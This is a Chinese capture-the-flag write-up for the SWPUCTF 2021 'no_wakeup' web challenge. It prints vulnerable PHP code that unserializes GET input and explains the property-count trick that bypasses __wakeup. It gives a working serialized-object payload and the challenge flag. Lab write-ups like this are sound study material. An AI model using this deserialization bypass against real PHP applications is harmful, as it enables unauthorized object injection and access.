[SWPUCTF 2021 新生赛]no_wakeup

题目来源：nssctf

题目类型：web

涉及考点：PHP反序列化

1. 题目给了一个点击按钮，点进去看看：

进去后就是代码审计了：

<?php

header("Content-type:text/html;charset=utf-8");
error_reporting(0);
show_source("class.php");

class HaHaHa{
        public $admin;
        public $passwd;

        public function __construct(){
            $this->admin ="user";
            $this->passwd = "123456";
        }

        public function __wakeup(){
            $this->passwd = sha1($this->passwd);
        }

        public function __destruct(){
            if($this->admin === "admin" && $this->passwd === "wllm"){
                include("flag.php");
                echo $flag;
            }else{
                echo $this->passwd;
                echo "No wake up";
            }
        }
    }

$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);
?>

题目要求GET传入p，并对其反序列化。

题目初始赋值有：

$this->admin ="user";
$this->passwd = "123456";

随后是__wakeup()魔术方法，对passwd进行sha1加密

最后判断$this->admin === "admin" && $this->passwd === "wllm"，这里用的是强比较

当返回true时输出flag

2. 构造payload

对于上述代码，我们需要给$this->admin赋值admin，给$this->passwd赋值wllm，同时需要绕过__wakeup()

绕过方法：

序列化字符串中表示对象属性个数的值大于真实的属性个数

因此写出php代码如下：

再修改下对象属性个数（大于2即可），最终payload如下：

?p=O:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

得到flag：

NSSCTF{d44a7a8f-4ec8-4144-947d-065a8369ce24}

日期：2023.7.30

作者：y0Zero

本栏目推荐文章
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest
• 2021 Jiangsu Collegiate Programming Contest
• 【THM】OWASP Top 10(2021版)-学习
• [ACTF2020 新生赛]Exec 1
• P7830 [CCO2021] Through Another Maze Darkly
• P8386 [PA2021] Od deski do deski
• “华为杯”杭州电子科技大学2023新生编程大赛 1005
• JOISC 2021 记录
• [省选联考 2021 A/B 卷] 卡牌游戏

no_wakeup 新生 SWPUCTF wakeup 2021no_wakeup新生swpuctf wakeup 新生swpuctf 2021 pop 逻辑 新生swpuctf 2021 新生swpuctf easyapp 2021 新生swpuctf 2021 re2 fakerandom新生swpuctf 2021 finalrce新生swpuctf 2021 fakebase新生swpuctf 2021 pseudoprotocols新生swpuctf 2021 新生swpuctf babyrce 2021